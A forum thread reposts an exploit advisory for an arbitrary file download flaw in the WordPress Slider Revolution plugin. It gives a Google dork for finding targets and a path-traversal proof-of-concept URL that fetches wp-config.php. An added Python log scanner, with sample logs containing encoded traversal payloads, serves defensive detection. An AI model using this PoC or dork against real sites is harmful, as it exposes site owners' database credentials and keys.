Aerosol Posted March 30, 2015

# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# Software Link : Premium plugin
# Dork Google: revslider.php "index of"
# Date : 2014-07-24
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################
# Description

Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability

######################
# PoC

http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#####################

Discovered By : Claudio Viviani
                http://www.homelab.it
                info@homelab.it
                homelabit@protonmail.ch
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
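
Added example, not part of the original post or the advisory: a log check a defender can run to find requests that match the PoC pattern above, i.e. the `revslider_show_image` action with an `img` value that points outside the image directory. The log lines, the image-extension allow-list and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Mar/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2015/03/slide1.jpg HTTP/1.1" 200 48211
203.0.113.9 - - [30/Mar/2015:10:02:11 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120
203.0.113.9 - - [30/Mar/2015:10:02:15 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%252e%252e%2Fwp-config.php HTTP/1.1" 200 3120
198.51.100.7 - - [30/Mar/2015:10:03:40 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif")  # assumed allow-list

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify_img(img):
    """Return a reason string if the img value is suspicious, else None."""
    path = fully_decode(img).replace("\\", "/")
    if ".." in path.split("/"):
        return "path traversal"
    if path.startswith("/") or re.match(r"^[A-Za-z]:", path):
        return "absolute path"
    if not path.lower().endswith(IMAGE_EXTS):
        return "non-image extension"
    return None

def scan(log_text):
    """Return (client, status, img, reason) for suspicious revslider_show_image requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        query = parse_qs(url.query)  # decodes one layer of percent-encoding
        if not url.path.endswith("/admin-ajax.php") or query.get("action") != ["revslider_show_image"]:
            continue
        for img in query.get("img", []):
            reason = classify_img(img)
            if reason:
                findings.append((client, int(status), img, reason))
    return findings
```

A flagged request that returned status 200 for `wp-config.php` means the database credentials and secret keys in that file should be treated as disclosed and rotated.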
UnixDevel Posted March 30, 2015

It's pretty old.. I actually knew about it :) because I worked with the company that disc